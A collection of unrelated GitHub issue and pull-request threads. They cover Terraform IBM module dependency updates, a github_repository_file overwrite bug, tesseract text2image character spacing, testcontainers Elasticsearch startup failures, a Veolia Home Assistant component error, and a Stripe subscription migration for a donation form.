"repo": "terraform-ibm-modules/terraform-ibm-mas",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-mas/issues/65",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
2286827690
|
fix: added for k8S_31 vulnerability
Issue: https://github.com/terraform-ibm-modules/terraform-ibm-mas/issues/16
Description
Fix CKV_K8S_31
Removed the commented code to give better readability
Release required?
[ ] No release
[X] Patch release (x.x.X)
[ ] Minor release (x.X.x)
[ ] Major release (X.x.x)
Release notes content
Run the pipeline
If the CI pipeline doesn't run when you create the PR, the PR requires a user with GitHub collaborators access to run the pipeline.
Run the CI pipeline when the PR is ready for review and you expect tests to pass. Add a comment to the PR with the following text:
/run pipeline
Checklist for reviewers
[ ] If relevant, a test for the change is included or updated with this PR.
[ ] If relevant, documentation for the change is included or updated with this PR.
For mergers
Use a conventional commit message to set the release level. Follow the guidelines.
Include information that users need to know about the PR in the commit message. The commit message becomes part of the GitHub release notes.
Use the Squash and merge option.
/run pipeline
/run pipeline
/run pipeline
:tada: This PR is included in version 1.7.2 :tada:
The release is available on GitHub release
Your semantic-release bot :package::rocket:
|
gharchive/pull-request
| 2024-05-09T03:37:31 |
2025-04-01T04:36:03.319652
|
{
"authors": [
"ocofaigh",
"padmankosalaram",
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-mas",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-mas/pull/101",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
1303273176
|
chore(deps): update common-dev-assets digest to a79f9ae
This PR contains the following updates:
Package
Update
Change
common-dev-assets
digest
07e8c45 -> a79f9ae
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, click this checkbox.
This PR has been generated by Renovate Bot.
:tada: This PR is included in version 1.0.1 :tada:
The release is available on GitHub release
Your semantic-release bot :package::rocket:
|
gharchive/pull-request
| 2022-07-13T11:03:16 |
2025-04-01T04:36:03.324941
|
{
"authors": [
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-module-template",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-module-template/pull/44",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
2761638204
|
chore(deps): update common-dev-assets digest to 65fb570
This PR contains the following updates:
Package
Update
Change
common-dev-assets
digest
0aaf07b -> 65fb570
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, check this box
This PR has been generated by Renovate Bot.
/run pipeline
|
gharchive/pull-request
| 2024-12-28T09:01:20 |
2025-04-01T04:36:03.329263
|
{
"authors": [
"terraform-ibm-modules-dev",
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-secrets-manager-secret-group",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-secrets-manager-secret-group/pull/237",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
2553942959
|
chore(deps): update ci dependencies
This PR contains the following updates:
Package
Type
Update
Change
common-dev-assets
digest
0685378 -> 51475f0
github.com/terraform-ibm-modules/ibmcloud-terratest-wrapper
require
minor
v1.38.3 -> v1.39.3
Release Notes
terraform-ibm-modules/ibmcloud-terratest-wrapper (github.com/terraform-ibm-modules/ibmcloud-terratest-wrapper)
v1.39.3
Compare Source
Bug Fixes
handle failed edge cases (#869) (42eef2a)
v1.39.2
Compare Source
Bug Fixes
add an additional check before Undeploy, to ensure we do not trigger while still deploying (#868) (f427c67)
v1.39.1
Compare Source
Bug Fixes
Fail if undeploy stack fails (#867) (7b83c71)
v1.39.0
Compare Source
Features
refactor of EPX stacks tests (#866) (57dd998)
v1.38.4
Compare Source
Bug Fixes
for potential nil response object from schematics (#865) (cb253f3)
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, check this box
This PR has been generated by Renovate Bot.
ℹ Artifact update notice
File name: tests/go.mod
In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):
1 additional dependency was updated
Details:
Package
Change
github.com/IBM/project-go-sdk
v0.3.0 -> v0.3.6
/run pipeline
/run pipeline
/run pipeline
/run pipeline
/run pipeline
:tada: This PR is included in version 1.3.3 :tada:
The release is available on GitHub release
Your semantic-release bot :package::rocket:
|
gharchive/pull-request
| 2024-09-28T01:37:36 |
2025-04-01T04:36:03.349010
|
{
"authors": [
"terraform-ibm-modules-dev",
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-secrets-manager-secret",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-secrets-manager-secret/pull/189",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
607226078
|
github_repository_file cant update/overwrite existing files.
Terraform Version
Terraform v0.12.23
provider.aws v2.57.0
provider.github v2.6.1
provider.helm v1.1.1
provider.kubectl (unversioned)
provider.kubernetes v1.11.1
Affected Resource(s)
github_repository_file
Terraform Configuration Files
resource "github_repository_file" "kubectl_container_github_actions" {
repository = github_repository.kubectl_container.name
file = ".github/workflows/main.yml"
content = file("${path.module}/github-actions-config-files/kubectl-container.yaml")
}
(I unfortunately had to use a raw file like this due to https://github.com/hashicorp/terraform/issues/23322, specifically that yamlencode doesn't support multiline block `key-name: |` type strings. But the content of the file should not matter for this particular bug.)
Debug Output
Complete terraform log not provided for security reasons. The relevant section of the log, with a small security redaction is here. This shows both the output sent to and the response from GitHub, so I hope this is sufficient.
https://gist.github.com/techdragon/ed73032aa5ab062674886a6c7478935e
Expected Behavior
github_repository_file should be able to update files that already exist.
Actual Behavior
Terraform fails to update an existing file in a github repository.
Error: PUT https://api.github.com/repos/<REDACTED>/contents/.github/workflows/main.yml: 422 Invalid request.
"sha" wasn't supplied. []
Steps to Reproduce
terraform apply using a github_repository_file for the first time on a file that is already in the git repo.
Important Factoids
It is relatively easy to work around this by importing the file, but it would be good to provide a more user-friendly experience than simply dropping the error message "sha" wasn't supplied directly from the upstream GitHub API. Either handle this by switching to an update and "doing what the user wanted", or emit a more user-friendly error message informing the user that they should import the resource first.
This would also make it easier to use template repositories, since the files in a template repository will exist after it's created by a github_repository resource, which then requires importing files created by the template before you can use github_repository_file resources to override their contents.
References
Hi @techdragon, thank you for submitting this issue! looking at the logs you've provided it does look like the provider is behaving as expected at apply time as information about the existing file is not known by terraform unless imported into state as you've suggested.
I do agree though that the error provided back to the user could be more detailed -- it looks like the Github API determines the file exists and attempts to do an update behind the scenes, but fails without a known sha and this error isn't reported back with better context. imo, I think providing better error messaging to a user is more feasible as the update-on-create behavior may conflict with the distinct CRUD operations expected in a resource.
@anGie44 thanks for digging in and working out the extra details that are going on with the GitHub API behind the scenes. I think a full resolution to the issue as it stands, needs to deal with two major details.
A better error response:
The default behaviour should definitely have a better error message. The heuristic (in pseudocode/flowchart form): perform-create -> invoke error handling logic for perform-create -> check if the error response is from a version of the GitHub API where we trust this heuristic is valid -> check if the error response contains `"sha" wasn't supplied.` -> return a better error message. That should be sufficiently accurate with respect to catching only this particular error response case.
Functionality improvements
While it's arguable that for 'normal' existing repositories, the user should be forced to add and import them before adding any terraform-managed files... I can see arguments for both sides with respect to the "existing" repo behaviour, so I won't really argue one way or the other on this part.
The use cases for "template repositories" are varied. In a number of cases I can see completely managing a repo through terraform; the simplest example I have on hand is creating a "GitHub Action Repo" from one of the templates provided by GitHub, which you want to use as part of your CI/CD pipeline. In this example, you likely know what you're adding to the repo before you create it, and want to automate things so that any webhook URLs or other IDs of systems managed by terraform are kept up to date. Having to create the repo with one terraform run, then add file resources for the required files that will be in every GitHub action repo, import these files, and add the remainder of your repo files, before applying the final configuration, seems like unnecessary complication.
To handle these kind of situations, it doesn't seem like a bad idea to add a specific flag that indicates the user knows and is opting-in to an "Upsert-Like" behaviour of "perform file update if file creation fails in such a way that it indicates the file already exists". Having explicit opt-in seems like a sensible way to both support the useful behaviour, and prevent conflict with the normal expected CRUD behaviour of resource objects.
@techdragon thanks for sharing your use case and highlighting the incompatibility between template use and repository file management. I've been playing around with this locally and aim to push up a proposed fix that adds an overwrite flag.
Traditionally Terraform only manages what it knows about, so expecting it to update something it didn't create feels a bit unfair. I've seen a similar use case in other providers/resources and they will also generate an error that the resource already exists (we could catch the returned error and make it more user friendly though).
IMO the real solution here is to import the file into the state using terraform import and then Terraform will manage the file correctly.
|
gharchive/issue
| 2020-04-27T04:37:24 |
2025-04-01T04:36:03.396609
|
{
"authors": [
"anGie44",
"jcudit",
"shoekstra",
"techdragon"
],
"repo": "terraform-providers/terraform-provider-github",
"url": "https://github.com/terraform-providers/terraform-provider-github/issues/438",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
2006687104
|
Sweeping crumbs for grammatical fixes
What is the change?
This PR sweeps the armi crumbs for grammatical fixes and tweaks.
Checklist
[x] This PR has only one purpose or idea.
[x] Tests have been added/updated to verify that the new/changed code works.
[x] The code style follows good practices.
[x] The commit message(s) follow good practices.
[x] The release notes (location doc/release/0.X.rst) are up-to-date with any important changes.
[x] The documentation is still up-to-date in the doc folder.
[x] No requirements were altered.
[x] The dependencies are still up-to-date in pyproject.toml.
Reviewing now.
|
gharchive/pull-request
| 2023-11-22T16:16:08 |
2025-04-01T04:36:03.488544
|
{
"authors": [
"bdlafleur",
"keckler"
],
"repo": "terrapower/armi",
"url": "https://github.com/terrapower/armi/pull/1488",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
1966225028
|
SW-4366 Add more batch details
Add new details about seedling batches:
Germination rate
Loss rate
Substrate (enum)
Substrate notes
Treatment (enum)
Treatment notes
Germination and loss rates are currently always null; the calculations will be
added in a future change, but they're included here to reduce API churn.
Current dependencies on/for this PR:
main
PR #1433
PR #1432
PR #1428
PR #1434
PR #1435 👈
This comment was auto-generated by Graphite.
|
gharchive/pull-request
| 2023-10-27T21:41:47 |
2025-04-01T04:36:03.498357
|
{
"authors": [
"sgrimm"
],
"repo": "terraware/terraware-server",
"url": "https://github.com/terraware/terraware-server/pull/1435",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
1558904732
|
SW-2777 Use selected locale from Keycloak for new users
If a new user has selected a locale during registration, record it in their
Terraware user information.
Current dependencies on/for this PR:
main
PR #922 👈
This comment was auto-generated by Graphite.
|
gharchive/pull-request
| 2023-01-26T23:02:45 |
2025-04-01T04:36:03.500697
|
{
"authors": [
"sgrimm"
],
"repo": "terraware/terraware-server",
"url": "https://github.com/terraware/terraware-server/pull/922",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
1538395144
|
SW-2658 Default date/time in nursery time zone for inventory add batch
Added timezone to create inventory and add batch.
Noticed that updating the "addedDate" when editing a batch doesn't update it in the backend, the api doesn't accept an addedDate. Is it correct that "addedDate" is editable in the frontend?
I see that even if we edit addedDate, we don't pass the edited value to the BE, we pass the initial value. The BE does accept it. Could be a UI bug.
|
gharchive/pull-request
| 2023-01-18T17:30:54 |
2025-04-01T04:36:03.502631
|
{
"authors": [
"constanzauanini",
"karthikbtf"
],
"repo": "terraware/terraware-web",
"url": "https://github.com/terraware/terraware-web/pull/1045",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
1334751341
|
Support plugins
This PR suggests adding support for plugins to the shogun-gis-client using the module-federation plugin of webpack, which allows splitting applications into multiple builds that form a single one.
Following this approach, a plugin for the gis client can be built as a completely standalone application and easily plugged in by setting up a path for its sources. Generally speaking, a plugin is just an exported object implementing the ClientPlugin type:
import {
faPuzzlePiece
} from '@fortawesome/free-solid-svg-icons';
import {
ClientPlugin
} from '@terrestris/shogun-gis-client/plugin';
export const TestPlugin: ClientPlugin = {
key: 'example-plugin',
component: () => {
return <span>Example Plugin</span>
},
integration: {
placement: 'tool-menu',
insertionIndex: 1,
label: 'ExamplePlugin.menuLabel',
icon: faPuzzlePiece
},
i18n: {
de: {
translation: {
ExamplePlugin: {
menuLabel: 'de: Example Plugin'
}
}
},
en: {
translation: {
ExamplePlugin: {
menuLabel: 'en: Example Plugin'
}
}
}
},
reducers: {
examplePlugin: // a redux reducer function
}
};
Where:
key contains the ID of the plugin.
component contains the component itself (defined as react function component).
integration contains the placement options for the component. Currently it's only possible to integrate plugins into the ToolMenu; other integration points, such as a map control or a footer element, might be implemented in follow-ups as needed.
i18n contains the locales for the component.
reducers contain a list of redux reducers for the store handling.
The integration of the plugin is controlled in the gis-client-config.js:
plugins: [{
name: 'ExamplePlugin',
exposedPath: './Plugin',
resourcePath: '/client-plugin/index.js'
}]
The values correspond to the configuration of the ModuleFederationPlugin:
new ModuleFederationPlugin({
name: 'ExamplePlugin',
filename: 'index.js',
exposes: {
'./Plugin': './src/index'
}
});
Please review @terrestris/devs.
Thanks for the reviews!
|
gharchive/pull-request
| 2022-08-10T14:50:42 |
2025-04-01T04:36:03.509432
|
{
"authors": [
"dnlkoch"
],
"repo": "terrestris/shogun-gis-client",
"url": "https://github.com/terrestris/shogun-gis-client/pull/250",
"license": "BSD-2-Clause",
"license_type": "permissive",
"license_source": "github-api"
}
|
1607063640
|
🛑 teslam.in is down
In 5d98312, teslam.in (https://teslam.in/.well-known/nodeinfo) was down:
HTTP code: 530
Response time: 44 ms
Resolved: teslam.in is back up in eef5511.
|
gharchive/issue
| 2023-03-02T15:56:36 |
2025-04-01T04:36:03.523506
|
{
"authors": [
"teslamint"
],
"repo": "teslamint/uptime",
"url": "https://github.com/teslamint/uptime/issues/266",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
360140066
|
Text2image does not draw char_spacing correctly
Tesseract Open Source OCR Engine v4.0.0-beta.4-18-g4370
text2image 4.0.0-beta.4-18-g4370
Linux bogon 3.10.0-862.3.3.el7.x86_64
Current Behavior:
With resolution (PPI) = 300, 12pt equals 50px in font size
The 2.0 em I set in char_spacing should equal 100 px
By the way, I set leading to 100px as a comparison
It is much less than 100px between characters
Is there anything I have misunderstood?
The 100px spacing turns out to be 24px, which means it is calculated at 72 PPI (100 px × 72/300 = 24 px)
72 is a very common DPI value, so I think maybe they are mixed up.
It is a little bit confusing to use two standards together in one picture.
Looks like you found a bug :-)
Here's the relevant code
https://github.com/tesseract-ocr/tesseract/blob/d2febafdcdb80747a2365e85b52d9f4e3de586ab/src/training/text2image.cpp#L462
https://github.com/tesseract-ocr/tesseract/blob/5fdaa479da2c52526dac1281871db5c4bdaff359/src/training/stringrenderer.h#L68
https://github.com/tesseract-ocr/tesseract/blob/09f4179e89e235c95be99c0280805dd0735ccc84/src/training/stringrenderer.cpp#L194
Pango's relevant docs:
https://developer.gnome.org/pango/stable/pango-Text-Attributes.html#pango-attr-letter-spacing-new
https://developer.gnome.org/pango/stable/pango-Glyph-Storage.html#PANGO-SCALE:CAPS
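For illustration, the unit mixup described in this issue can be checked with a little arithmetic (a hedged sketch; the numbers are those quoted above, and the helper names are made up):

```python
# Sketch of the PPI-vs-point mixup (assumed values from the issue report).
POINTS_PER_INCH = 72  # typographic points per inch

def pt_to_px(points, ppi):
    """Convert a size in typographic points to pixels at a given resolution."""
    return points * ppi / POINTS_PER_INCH

ppi = 300
em_px = pt_to_px(12, ppi)         # 12 pt font -> 50 px, so 1 em = 50 px
desired_spacing_px = 2.0 * em_px  # char_spacing of 2.0 em -> 100 px expected

# If the renderer hands the spacing to Pango as if pixels were points,
# it comes out at 72/300 of the intended size:
actual_px = desired_spacing_px * POINTS_PER_INCH / ppi  # 24 px, as observed
```

This reproduces the observed 24 px, which is why the conversion into Pango units (PANGO_SCALE per device unit) has to use the actual rendering resolution.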
Thank you so much for your help.
I'll change my code to fit the Pango units.
|
gharchive/issue
| 2018-09-14T03:04:57 |
2025-04-01T04:36:03.531013
|
{
"authors": [
"amitdo",
"zwwlouis"
],
"repo": "tesseract-ocr/tesseract",
"url": "https://github.com/tesseract-ocr/tesseract/issues/1907",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
1427156228
|
All Elasticsearch module tests fail
Describe the bug
All Elasticsearch module tests fail on a clean operating system.
To Reproduce
Steps to reproduce the behavior:
Install Docker desktop (Rancher desktop, Moby engine)
Run Elasticsearch module tests
All tests fail with following error message: Docker.DotNet.DockerApiException : Docker API responded with status code=Conflict, response={"message":"Container 776f26413636a94482827057706c065e5d697951e882c6a84a0827979d6aea6a is not running"}
Expected behavior
All tests should pass.
Screenshots
Desktop (please complete the following information):
version: 2.1.0
os: Windows 11 (WSL), Ubuntu Desktop 20.04 LTS
docker: Docker Desktop, Rancher Desktop, Moby engine (Microsoft build)
Additional context
The Elasticsearch container does not start and fails. Container logs provide the following evidence:
As the last log message: ERROR: [1] bootstrap checks failed. You must address the points described in the following [1] lines before starting Elasticsearch.
It refers to result of bootstrap check service: bootstrap check failure [1] of [1]: max virtual memory areas vm.max_map_count [65530] is too low, increase to at least [262144]
Based on the following discussions, there are several ways to solve it:
https://stackoverflow.com/questions/51445846/elasticsearch-max-virtual-memory-areas-vm-max-map-count-65530-is-too-low-inc
https://www.elastic.co/guide/en/cloud-on-k8s/master/k8s-virtual-memory.html
https://discuss.elastic.co/t/eck-elasticsearch-pod-not-starting-on-aks-max-virtual-memory-areas-vm-max-map-count-65530-is-too-low-increase-to-at-least-262144/305788
The last one contains information regarding disabling the bootstrap check for non-production and low-memory clusters. I think this is the best approach to fix the tests. I will try to provide a PR to fix this based on the last option.
In Java, we implemented this change regarding the default heap size for ES, so it would probably help here as well?
https://github.com/testcontainers/testcontainers-java/pull/5684
Thank you @kiview for the quick reply. I created PR #641 where I disable the bootstrap check and, based on the documentation, disallow the use of mmap. Could you look at it and suggest whether this is enough? Or should we solve it even for developers who use this module for testing purposes, or is it their responsibility?
I am not that experienced with the current module structure in the .NET implementation, but in general, if we can identify good default values for a container in the context of integration testing, it generally makes sense to make them part of the default module implementation.
I would favor increasing the default heap size too. Modules should contain a set of configurations that devs can immediately start with. I think it is fine to set or override the env variable for now. I would prefer not to mount the option files. @kiview what do you think?
In Java, we copy (don't mount) a default config file into the container before startup:
https://github.com/testcontainers/testcontainers-java/pull/5684/files#diff-8af1f477d2bcf3c11f31ecc8b703ce0873f869dbefd5714fa3c78810f02a7cc7R104
One of the reasons was also about the ENV approach being not a super stable integration point:
Elasticsearch 8 seems to have renamed ES_JAVA_OPTS to CLI_JAVA_OPTS on their docs https://www.elastic.co/guide/en/elasticsearch/reference/current/advanced-configuration.html. After testing, it seems like they have backwards compatibility for ES_JAVA_OPTS - but usage of both at the same time is unpredictable.
I will update the PR to have default value set up to minimal required value. I will try all possible ways to do it.
I am not sure if we can "copy" files like Java does at the moment. If not it would be a good opportunity to add it, otherwise we can simply use the Java approach right away.
Will investigate .NET possibilities
It looks like it is not supported yet, but we can add it without much effort, I think. We simply copy read-only files (from IMount configurations) before the container starts. Here is a simple test:
diff --git a/src/Testcontainers/Containers/TestcontainersContainer.cs b/src/Testcontainers/Containers/TestcontainersContainer.cs
index 2b2a199..a3ca7bd 100644
--- a/src/Testcontainers/Containers/TestcontainersContainer.cs
+++ b/src/Testcontainers/Containers/TestcontainersContainer.cs
@@ -303,6 +303,9 @@ namespace DotNet.Testcontainers.Containers
var id = await this.client.RunAsync(this.configuration, ct)
.ConfigureAwait(false);
+ await this.client.CopyFileAsync(id, "/tmp/foo", Array.Empty<byte>(), 384, 0, 0, ct)
+ .ConfigureAwait(false);
+
return await this.client.InspectContainer(id, ct)
.ConfigureAwait(false);
}
OC, we need some more logic to detect which files we copy / directories we mount.
I was thinking the same way, but with a full implementation. I will push it soon.
I thought about it too. I think we should move it to DockerContainerOperations or TestcontainersClient and then just filter the Mounts property.
_ = Task.WhenAll(configuration.Mounts
.Where(mount => AccessMode.ReadOnly.Equals(mount.AccessMode))
.Where(mount => File.Exists(mount.Source))
.Select(mount => this.CopyFileAsync(id, mount.Target, Array.Empty<byte>(), 420, 0, 0)));
Running the tests on Windows (WSL) I noticed that this issue is not related to the Elasticsearch JVM options. It is a host limitation:
https://www.elastic.co/guide/en/elasticsearch/reference/current/vm-max-map-count.html#vm-max-map-count
https://stackoverflow.com/a/66547784/690017
@kiview Am I missing anything? How does tc-java make sure the host is set up correctly?
@kiview can you check following:
wsl -d docker-desktop
cat /proc/sys/vm/max_map_count
|
gharchive/issue
| 2022-10-28T11:59:24 |
2025-04-01T04:36:03.737429
|
{
"authors": [
"HofmeisterAn",
"kiview",
"vlaskal"
],
"repo": "testcontainers/testcontainers-dotnet",
"url": "https://github.com/testcontainers/testcontainers-dotnet/issues/640",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
357414245
|
Update Pulsar Container
Simply startup script using defaults.
Hi @aahmed-se! It seems that 2.2.0 is not released yet :D
my mistake it's actually another change for something else, will mark it wip for now
This is ready for review now
Comments addressed
Made the changes
@bsideup let me know if there any more comments.
@bsideup is there anything else to change ?
@aahmed-se it looks great, thank you 👍
Released for preview in 1.9.0-rc2, to be published on Bintray.
Thanks @aahmed-se!
|
gharchive/pull-request
| 2018-09-05T21:38:33 |
2025-04-01T04:36:03.741246
|
{
"authors": [
"aahmed-se",
"bsideup",
"rnorth"
],
"repo": "testcontainers/testcontainers-java",
"url": "https://github.com/testcontainers/testcontainers-java/pull/858",
"license": "mit",
"license_type": "permissive",
"license_source": "bigquery"
}
|
1006548038
|
First connection error: "Réessayer la configuration: None"
Hello,
after 24h of operation, I still get the same error message "Réessayer la configuration: None"
and messages in the log, see below.
However, on the site https://www.eau-services.com/ I do have the daily/hourly data. (Veolia Méditerranée site)
Do you have an idea?
Thanks
log ******************
2021-09-24 16:44:56 ERROR (MainThread) [custom_components.veolia] Unexpected error fetching veolia consumption update data: 'consommation(litre)'
Traceback (most recent call last):
File "/usr/src/homeassistant/homeassistant/helpers/update_coordinator.py", line 187, in _async_refresh
self.data = await self._async_update_data()
File "/usr/src/homeassistant/homeassistant/helpers/update_coordinator.py", line 147, in _async_update_data
return await self.update_method()
File "/config/custom_components/veolia/init.py", line 71, in _get_consumption
daily_consumption = await api.get_consumption(
File "/usr/local/lib/python3.9/site-packages/backoff/_async.py", line 133, in retry
ret = await target(*args, **kwargs)
File "/usr/local/lib/python3.9/site-packages/pyolia/client.py", line 100, in get_consumption
return await self._get_daily_consumption(month, year)
File "/usr/local/lib/python3.9/site-packages/pyolia/client.py", line 109, in _get_daily_consumption
return [int(row[CONSUMPTION_HEADER]) for row in reader]
File "/usr/local/lib/python3.9/site-packages/pyolia/client.py", line 109, in
return [int(row[CONSUMPTION_HEADER]) for row in reader]
KeyError: 'consommation(litre)'
I am indeed running into the same issue. I will look into where it may come from sometime next week.
The issue is now fixed with version 0.3.3.
hello
everything works
thank you
Pierre
On Mon, Sep 27, 2021 at 09:47, Thibaut @.***> wrote:
The issue is now fixed with version 0.3.3.
|
gharchive/issue
| 2021-09-24T14:51:52 |
2025-04-01T04:36:03.806451
|
{
"authors": [
"mathep34",
"tetienne"
],
"repo": "tetienne/veolia-custom-component",
"url": "https://github.com/tetienne/veolia-custom-component/issues/29",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
1413160147
|
Update README.md
just a simple misspelling.
build.example actually existed before (https://github.com/tetratelabs/proxy-wasm-go-sdk/blob/4e9b9116c8a617570a4976c1f6822c8fefc5cae4/Makefile#L4-L8) but was accidentally deleted in https://github.com/tetratelabs/proxy-wasm-go-sdk/commit/3851b164108c97390e03c4e314ddbd97b509272e#diff-76ed074a9305c04054cdebb9e9aad2d818052b07091de1f20cad0bbac34ffb52. Could you restore build.example rather than fix the typo?
makes sense. this is a new PR
fyi you don't need to close the PR - you can repurpose it, and that's a really normal thing on GitHub
|
gharchive/pull-request
| 2022-10-18T12:41:25 |
2025-04-01T04:36:03.809340
|
{
"authors": [
"mathetake",
"omidtavakoli"
],
"repo": "tetratelabs/proxy-wasm-go-sdk",
"url": "https://github.com/tetratelabs/proxy-wasm-go-sdk/pull/335",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
435925549
|
Compress exponents of dim a bit more.
Initially, dim was implemented as an array of character-sized rational-exponents. But with five fundamental dimensions, any non-constexpr instance of dim would consume more than a four-byte word, especially when padded as in dyndim.
Class rational has already been modified so that it can use a number of bits that is not a multiple of eight.
The next step is to modify dim so that, say, each dimension's exponent is a rational number with four bits for the numerator and two for the denominator. Then the set of dimensional exponents would fit in 30 bits, in a single 32-bit word.
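To make the proposal concrete, here is a hypothetical packing sketch (not the library's actual code; it assumes a 4-bit two's-complement numerator and a 2-bit field storing denominator − 1 for each of the five dimensions):

```python
# Hypothetical layout: 5 dimensions x (4-bit signed numerator + 2-bit
# denominator field) = 30 bits, fitting in one 32-bit word.
BITS_NUM, BITS_DEN = 4, 2
FIELD = BITS_NUM + BITS_DEN  # 6 bits per dimension
NDIM = 5

def pack(exps):
    """exps: list of (num, den) pairs with -8 <= num <= 7 and 1 <= den <= 4."""
    word = 0
    for i, (n, d) in enumerate(exps):
        field = ((n & 0xF) << BITS_DEN) | (d - 1)  # store den - 1 in 2 bits
        word |= field << (i * FIELD)
    return word

def unpack(word):
    out = []
    for i in range(NDIM):
        field = (word >> (i * FIELD)) & 0x3F
        n = field >> BITS_DEN
        if n & 0x8:          # sign-extend the 4-bit numerator
            n -= 16
        out.append((n, (field & 0x3) + 1))
    return out
```

Round-tripping e.g. `[(1, 1), (-2, 1), (1, 2), (0, 1), (3, 1)]` through `pack`/`unpack` returns the same exponents, and the packed word stays below 2**30, so the whole set of exponents fits in a single 32-bit word.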
Issue is fixed by previous commit (b6f7fff).
|
gharchive/issue
| 2019-04-22T22:55:06 |
2025-04-01T04:36:03.820440
|
{
"authors": [
"tevaughan"
],
"repo": "tevaughan/units",
"url": "https://github.com/tevaughan/units/issues/2",
"license": "BSD-3-Clause",
"license_type": "permissive",
"license_source": "github-api"
}
|
1815767733
|
Move circle to subscriptions
What's this PR do?
Adds stripe scheduled subscription creation to our /circle membership form. Also uses our new stripe webhooks functionality to listen for subscription creation success events from business membership submission and logs recurring donations and opportunities in Salesforce respectively.
Why are we doing this? How does it help us?
This is the next step in a larger modernization project for the donations app that will give us a more reliable and less brittle system for handling recurring donations. This update modernizes the /circle donation form in particular, bringing all of our forms in line with using stripe subscriptions (and scheduled subscriptions, in this case) where applicable.
How should this be manually tested?
Visit the circle form on staging
Try giving donations for different tiers (i.e. "Editor's", "Founders'", etc.), at different intervals, with or without agreeing to cover fees using a test card
For each of these donations...
In our stripe dashboard, make sure you are in "Test Mode" (upper corner)
Choose the "Customers" tab and you should see the donation you made, listed by the First Name/Last Name you provided
Clicking through to the customer you added should show a screen listing a Circle subscription
Since circle memberships only last for 3 years, you will find cancel info tied to the subscription as seen in the above screenshot
Login to our salesforce sandbox (deets listed under "Salesforce Test (2023 refactor)")
Follow the instructions here to ensure that the donation came through on the salesforce end as expected
How should this change be communicated to end users?
We'll let membership team know when this is deployed.
Are there any smells or added technical debt to note?
The handling of stripe products is admittedly messy. The hope is that when we refactor the frontend, we can incorporate some more stripe pieces and have the products/prices loaded with the rest of the page instead of being referenced/grabbed here in the midst of the post request.
Aside from that, after these updates and updates for quarantined records are out in the wild and working, we should be able to remove a lot of the older code this is replacing.
What are the relevant tickets?
https://airtable.com/appyo1zuQd8f4hBVx/tbloNZu8GkM52NKFR/viwS1XPty68eK4Ett/recwk25CEwmxFf1cm?blocks=hide
Have you done the following, if applicable:
(optional: add explanation between parentheses)
[ ] Added automated tests? ( )
[ ] Tested manually on mobile? ( )
[ ] Checked BrowserStack? ( )
[ ] Checked for performance implications? ( )
[ ] Checked accessibility? ( )
[ ] Checked for security implications? ( )
[ ] Updated the documentation/wiki? ( )
TODOs / next steps:
[ ] your TODO here
@matthewdylan something I'm seeing right away is that the amounts and some data seems incorrect in Salesforce.
Example scenario:
Account: testpr1088-ec@foo.com
Level: Filled out form as Editor's Circle Yearly w/ fees
Salesforce results:
Expected: Three separate $1000 opportunities in Salesforce
Saw: Three separate $3000 opportunities in Salesforce
Expected: Test PR1088-EditorsCircle contact info shows Editor's Circle
Saw: Test PR1088-EditorsCircle contact info shows Leadership Circle
@matthewdylan - I'm getting quarantined again. I think we should update this branch with master to test it with the other pieces in place
@matthewdylan something I'm seeing right away is that the amounts and some data seems incorrect in Salesforce.
Example scenario:
Account: testpr1088-ec@foo.com
Level: Filled out form as Editor's Circle Yearly w/ fees
Salesforce results:
Expected: Three separate $1000 opportunities in Salesforce
Saw: Three separate $3000 opportunities in Salesforce
Expected: Test PR1088-EditorsCircle contact info shows Editor's Circle
Saw: Test PR1088-EditorsCircle contact info shows Leadership Circle
We talked through this one in slack, but ultimately, the issue was resolved by setting the open ended status on the rdo to "None" instead of "Open".
@matthewdylan - I'm getting quarantined again. I think we should update this branch with master to test it with the other pieces in place
Good catch on this one. Updated to be in line with master earlier this morning.
Overall this looks great @matthewdylan! 🎉 👏🏼 I tried every combination 😵
